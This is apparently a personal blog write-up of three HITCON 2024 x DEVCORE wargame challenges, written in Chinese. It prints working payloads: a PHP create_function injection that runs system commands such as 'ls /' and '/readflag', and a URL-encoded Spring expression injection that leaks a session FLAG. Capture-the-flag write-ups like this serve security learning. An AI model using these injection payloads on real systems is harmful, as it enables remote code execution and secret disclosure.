Unicorn's Blog

HITCON 2024 x DEVCORE Wargame

12 Aug 2024

Welcome

image

使用線上工具解密

image

flag: DEVCORE{h0pe_y0u_enj0y_0ur_wargame}

Supercalifragilisticexpialidocious

明顯 create_function('', $code); 有洞。

image

使用 exploitDB 的 payload

payload: return -1 * var_dump($a[""]);}phpinfo();/*"]

成功看到 phpinfo()

image

payload: return -1 * var_dump($a[""]);}system('ls /');/*"]

發現 /readflag

image

payload: return -1 * var_dump($a[""]);}system('/readflag');/*"]

執行成功取得 flag。

image

flag: DEVCORE{o1d_th1ng_1s_g00d}

Expressionism

IndexController.java 看到 FLAG 被放在 session。

session.setAttribute("FLAG", System.getenv("FLAG"));

index.jsp 中有可以 injection 的地方。

<p><spring:message code="life.quotes.${id}" /></p>

Hack tricks 找到可用 ${} injection。

payload: /?id=${FLAG}

送出後發現有違法字元。

image

payload: /?id=%24%7BFLAG%7D

把 payload 做 url encoding 後再試一次,成功取得 flag。

image

flag: DEVCORE{d1d_y0u_kn0w_th1s_b3f0r3}